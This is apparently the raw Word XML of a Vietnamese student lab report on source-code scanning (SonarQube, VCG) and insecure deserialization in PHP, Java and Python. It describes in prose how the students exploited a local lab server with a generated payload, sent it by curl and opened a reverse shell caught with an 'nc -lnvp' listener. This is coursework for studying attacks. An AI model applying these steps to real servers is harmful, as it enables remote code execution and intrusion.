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Nhóm 9:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000002">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">20520618 - Nguyễn Bình Thục Trâm</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000003">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">20520648 - Nguyễn Bùi Kim Ngân</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000004">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">20520605 - Võ Anh Kiệt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000005">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="42"/>
          <w:szCs w:val="42"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="42"/>
          <w:szCs w:val="42"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LAB 02</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u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Yêu cầu 1.1: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sinh viên chỉnh sửa file main.sh trong thư mục của CRASS để đảm bảo chỉ chạy các chức năng bên dưới khi quét 1 thư mục mã nguồn.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000008">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="3225800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="37"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4171950" cy="7277100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2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17195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3895725" cy="7515225"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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89572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b w:val="1"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Yêu cầu 1.2: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Dựa vào kết quả sau khi quét, sinh viên tìm và giải thích ngắn gọn 01 nguy cơ bảo mật có thể thấy trong mã nguồn của ứng dụng</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Nguy cơ bảo mật có thể thấy từ mã nguồn là </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sql injection</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000F">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId9">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.facebook.com/groups/bht.cnpm.uit/posts/946708845926790/</w:t>
        </w:r>
      </w:hyperlink>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225800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="31"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3225800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2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b w:val="1"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Yêu cầu 1.3:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Sinh viên sử dụng </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SonarQuabe</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> để quét mã nguồn của ứng dụng Sample App đã chạy ở Lab 1. Trình bày kết quả quét mã nguồn. </w:t>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3225800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="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Check ở phần báo lỗi đỏ</w:t>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5731200" cy="3225800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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Cross-Site Request Forgery (CSRF)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001A">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="26543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Các phương pháp phòng chống:</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Sử dụng các Re-Authentication (password or stronger), One-time Token, CAPTCHA, token password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001D">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Yêu cầu 1.4: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sinh viên tự tìm hiểu, cài đặt và đưa ra 1 ví dụ quét mã nguồn với 1 trong các công cụ sau:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">- Visual Code Grepper (VCG):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000020">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(https://github.com/nccgroup/VCG/tree/master/VCG-Setup/Release)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000021">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tải và install VCG, sau khi hoàn thành ta được giao diện</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000022">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="3225800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2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Chọn New Target File</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000024">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3057525" cy="3495675"/>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0575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Chọn file cần kiểm tra</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="35687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Chọn loại file cần kiểm tra, ở trong trường hợp này là cpp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="2771775" cy="2752725"/>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717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Sau đó chọn full scan để quét toàn bộ file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000033">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4724400" cy="36195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7244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Cuối cùng ta được kết quả</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000035">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="3225800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="4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b w:val="1"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Yêu cầu 2.1: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sinh viên tìm hiểu và giải thích ý nghĩa của output trên khi thực thi file php?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4229100" cy="1295840"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="26" name="image15.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image15.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:srcRect b="72601" l="49847" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4229100" cy="129584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Ý nghĩa của output:</w:t>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O:4:“User”:2 cho biết đây là object class User có 2 thuộc tính và serialize có 4 value. </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s:4:“name” giá trị là string, có 4 ký tự. Tương tự cho “Nhom9” và “isLoggedIn”.</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b:1 giá trị có kiểu boolean và bằng 1 tức thuộc tính isLoggedIn có giá trị true.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003F">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Yêu cầu 2.2: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Phân tích thử lý do vì sao </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">DangerousClass</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> là class có thể bị khai thác với cách hoạt động như vậy của file vulnerable-app-1.php?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000040">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="4292600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="4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Lí do DangerousClass có thể bị khai thác với cách hoạt động trên của file vulnerable-app-1.php là vì:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000042">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">File vulnerable-app-1.php sử dụng deserialize nhưng không có cơ chế kiểm tra đầu vào. (Chỉ lấy từ file serial_Nhom9 đã có sẵn), nên có thể khai thác  DangerousClass để thay đổi input như ý muốn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b w:val="1"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Yêu cầu 2.3: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sinh viên hiện thực ý tưởng của kẻ tấn công để thực thi lệnh id thay vì ls. Chạy đoạn code của attacker và vulnerable-app-1, cho biết kết quả?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45">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Code của attacker</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000046">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3952875" cy="2657475"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6" name="image8.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image8.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23"/>
                    <a:srcRect b="38348" l="50000" r="11287" t="15412"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="39528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6"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Kết quả:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000048">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="5295900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="4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b w:val="1"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Yêu cầu 2.4:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Sinh viên phân tích và giải thích ý nghĩa của đoạn code tấn công trên? Báo cáo kết quả chạy code tấn công?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">=&gt; Ý nghĩa đoạn tấn công này là:</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Trong file JavaSerial, nó sẽ tạo ra một class VulnObj tương tự với trong file JavaDeserial, sau đó, class JavaSerial sẽ tạo ra một object VulnObj nhưng thay vì cmd từ user thì lại lấy cmd được sử bởi kẻ tấn công là “ls” và ghi đè nó vào file normalObj.serial</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Khi đó, JavaDeserial lấy file normalObj.serial này và deserial ra để sử dụng nhưng không kiểm tra đầu vào, dẫn đến việc chương trình bị thay đổi công dụng.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Chạy </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">JavaSerial</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> và </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">JavaDeserial</w:t>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1200" cy="3225800"/>
            <wp:effectExtent b="0" l="0" r="0" t="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Chú ý 5 ký tự đầu tiên “rO0AB”. Sinh viên thử tìm hiểu mối liên hệ của 5 ký tự này và việc serialize đối tượng Java?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000050">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">=&gt; 5 kí tự này xuất hiện khi để xác định đây là một Java Serialization Object. Nếu phần serial obj chưa được xác định chính xác, dẫn đến việc attacker có thể tạo ra một Obj đặc biệt, gây nên một cuộc tấn công “Remote Code Execution”.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b w:val="1"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Yêu cầu 2.5: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Lý giải vì sao với định nghĩa class </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">VulnPickle</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, khi vulnerable-app-2 thực hiện load đối tượng từ file, ta có được kết quả như hình trên?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7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Kết quả chạy:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000057">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3419475" cy="506574"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="32" name="image22.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image22.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26"/>
                    <a:srcRect b="0" l="0" r="40365" t="84292"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3419475" cy="50657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7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Trong class </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">VulnPickle</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, thực hiện lệnh id command nên khi vulnerable-app-2 thực hiện load đối tượng từ file, ta có được kết quả như trên</w:t>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3176588" cy="649037"/>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176588" cy="64903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b w:val="1"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Yêu cầu 2.6: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sinh viên thực hiện khai thác lỗ hổng của webserver trên để thực hiện tấn công remote command execution để mở 1 reverse shell trên webserver? Trình bày chi tiết các bước tấn công</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Đầu tiên ta sẽ code để tấn công remote command execution, với thuật toán này ta có thể generate ra payload để có thể tấn công</w:t>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731200" cy="2082800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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Sau đó ta chạy đoạn code để generate payload</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731200" cy="571500"/>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Sau đó sử dụng lệnh curl và function POST và add vào đó payload vừa generate ra vào địa chỉ http://127.0.0.1:5000/vulnerable</w:t>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5731200" cy="546100"/>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Ở phía server ta thấy được rằng là lệnh POST đã được thực hiện</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731200" cy="1739900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2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Cuối cùng sử dụng lệnh nc -lnvp 4009 để kiểm tra lại</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695950" cy="962025"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2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6959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Vậy là đã thực hiện được tấn công remote command execution để mở 1 reverse shell trên webserver</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000068">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000069">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Yêu cầu 2.7:</w:t>
      </w:r>
    </w:p>
